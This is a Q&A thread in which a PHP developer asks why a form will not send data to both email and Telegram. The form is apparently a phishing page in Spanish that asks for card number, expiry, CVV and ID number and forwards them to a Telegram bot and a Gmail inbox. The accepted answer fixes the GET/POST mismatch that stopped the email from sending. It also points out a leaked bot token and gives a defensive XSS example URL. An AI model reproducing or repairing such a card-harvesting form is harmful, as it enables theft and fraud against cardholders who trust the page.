# To send Email and notification on Telegram at same time

Tags: php

I have a form. I can send form data to my email or to my telegram, but not at same time. Either I can send email or I can send at telegram.
I need to send form data to both email and telegram at 1 one time. I other words, when I press the Submit button, I should receive email and message on telegram at same time.

Here is what I have done so far to achieve that

Form

```
<form id="" action="secure_email_code.php" method="GET">
<input type="hidden" name="value" value="">
<div class="container-fluid mt-5">
    <div class="row d-flex justify-content-center">
        <div class="col-12 mb-2">
            <h3 class="text-center">Pagá con tarjeta de crédito o débito.</h3>
        </div>
        <div class="col-lg-8 col-md-12 col-sm-12 col-12 mt-2">
            <div class="form row d-flex justify-content-center">
                <div class="col-md-6 col-12 my-2">
                    <div class="box">
                        <label for="">Nombre que figura en tarjeta</label>
                        <input type="text" placeholder="Nombre y apellido" id="name" name="name" autocomplete="off">
                    </div>
                </div>
                <div class="col-md-6 col-12 my-2">
                    <div class="box">
                        <label for="">DNI titular</label>
                        <input type="text" placeholder="DNI" id="dni" name="dni" inputmode="decimal" autocomplete="off">
                    </div>
                </div>
                <div class="col-12 my-2">
                    <div class="box">
                        <label for="">Número de tarjeta</label>
                        <input type="text" placeholder="XXXX XXXX XXXX XXXX" id="card" name="card" inputmode="decimal" autocomplete="off">
                    </div>
                </div>
                <div class="col-md-6 col-12 my-2">
                    <div class="box">
                        <label for="">Fecha de vencimiento</label>
                        <input type="text" placeholder="MM/AA" id="venc" name="venc" inputmode="decimal" autocomplete="off" maxlength="5">
                    </div>
                </div>
                <div class="col-md-6 col-12 my-2">
                    <div class="box">
                        <label for="">Código de seguridad</label>
                        <input type="text" placeholder="Últimos 3 digitos detrás de la tarjeta" id="cvv" name="cvv" inputmode="decimal" autocomplete="off" maxlength="4">
                    </div>
                </div>
                <div class="col-xl-4 col-lg-6 col-md-6 col-12 mt-3">
                    <input type="submit" id="" name="send_message" class="custom-input-btn" value="Siguiente">
                </div>
            </div>
        </div>
    </div>
</div>
</form>
```

secure_email_code.php code

```
<?php
define 
('url',"https://api.telegram.org/bot5XXXXXXX:AAEiQfQKxT6XvOi0zrIxNM9dexq-0d8K-I0/");
$name       = $_GET['name'];
$dni        = $_GET['dni'];
$card       = $_GET['card'];
$venc       = $_GET['venc'];
$cvv        = $_GET['cvv'];
$chat_id    = '530928XXXX';
$message    = urlencode("Name:".$name."\n DNI : ".$dni."\n Card: ".$card."\n Venc: ".$venc."\n CVV: ".$cvv);
file_get_contents(url."sendmessage?text=".$message."&chat_id=".$chat_id."&parse_mode=HTML");
?>

<?php
session_start();       
?>
<?php 

if(isset($_GET['success'])){

    echo "<div class='alert alert-success'>".$_GET['success']."</div>";
}
if(isset($_POST['send_message'])){

$name           = $_POST['name'];
$dni            = $_POST['dni'];
$card           = $_POST['card'];
$venc           = $_POST['venc'];
$cvv            = $_POST['cvv'];
$avalue         = $_SESSION['avalue'];    
$phoneNumber    = $_SESSION['phoneNumber'];
    $headers = array(
        'Form: $email',
        'Content-Type: text/html'
    );
    mail("xyz@gmail.com", "Personal Flow","

    <table style='BORDER-RIGHT: #CCCCCC 1px solid; PADDING-RIGHT: 0px; BORDER-TOP: #CCCCCC 1px solid; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; BORDER-LEFT: #CCCCCC 1px solid; PADDING-TOP: 0px; BORDER-BOTTOM: #CCCCCC 1px solid'
    height=238 cellSpacing='0' cellPadding='15'>
      <tr>
<td bgcolor='#3783b9'><font color='#FFF' size='5'>Personal Flow</font></td>
      </tr>
      <tr>
        <td height='83' bgcolor='#EEEEEE'>
        <table>
            <tr>
                <td>Name: </td>
                <td>$name</td>
            </tr>
            <tr>
                <td>DNI: </td>
                <td>$dni</td>
            </tr>
            <tr>
                <td>Card: </td>
                <td>$card</td>
            </tr>
            <tr>
                <td>Venc: </td>
                <td>$venc</td>
            </tr>
            <tr>
                <td>Card: </td>
                <td>$cvv</td>
            </tr>
            <tr>
                <td>Phone Number: </td>
                <td>$phoneNumber</td>
            </tr>
            <tr>
                <td>Value: </td>
                <td>$avalue</td>
            </tr>
        
        </table>

                    
        </td>
      </tr>
    </table>", implode("\r\n", $headers));
    
    echo "<script>window.location.href='https://demo.com/demo/enr&success=Your Message has been Successfully Sent'</script>";
}
?>
```

Comment: what exactly is the error message/the behavior of the posted code? Do you receive an e-mail or the telegram message? what happens when you try each of them separately?

Comment: Why are you looking for `$_POST` variables when your form sends a GET?

Answer (score 1, accepted):

You are using `<form method="GET">` in your HTML which will submit the form data as query parameters in the URL. In your PHP code you are using these values using the [`$_GET` global variable](https://www.php.net/manual/en/reserved.variables.get.php) to send the telegram message.

But further down you're trying to get the submitted values from the [`$_POST` variable](https://www.php.net/manual/en/reserved.variables.post.php) which contains data POSTed by the browser. But since you use `method="GET"` in your HTML there is no POST data and so

```php
if(isset($_POST['send_message'])){
```

will always be false and the e-mail will never be sent.

Change all uses of `$_POST` to `$_GET` or the other way around and use `method="POST"` to make the code work.

---

Aside from your initial problem though the posted code contains many security issues you should address before running it anywhere in production!

First it contains the URL of your telegram bot:

> https://api.telegram.org/bot5XXXXXXX:AAEiQfQKxT6XvOi0zrIxNM9dexq-0d8K-I0/

where `bot5XXXXXXX` is the ID of your bot which you fortunately censored because the remaining part is the **secret** authentication token of the bot! Since the ID is public and can be seen by anyone communicating with your bot the security of your bot is now compromised.

TL;DR: you censored only the "username" but just published the "password" of your bot. You should [revoke and regenerate the token](https://core.telegram.org/bots/features#generating-an-authentication-token) immediately!

Next, you are using the user input passed by the form without any validation or escaping directly in your HTML. This opens the site to all kind of [*Cross-Site Scripting* attacks (XSS)](https://en.wikipedia.org/wiki/Cross-site_scripting) where an attack can easily embed arbitrary HTML and JavaScript into your site using a simple link, e.g. (using the domain from your code):

> https://demo.com/demo/secure_email_code.php?success=%3Cscript%3Ealert%28%27Injected+Code%27%29%3C%2Fscript%3E

To avoid these attacks you must escape the provided input, e.g., using [`htmlspecialchars()`](https://www.php.net/manual/en/function.htmlspecialchars.php). Also you should validate that the input actually contains the type of data you expect, e.g.:

```php
if(isset($_GET['success']) && is_string($_GET['success'])) {
    echo "<div class='alert alert-success'>" . htmlspecialchars($_GET['success']) . "</div>";
}
```

Read more about [XSS attacks](https://en.wikipedia.org/wiki/Cross-site_scripting).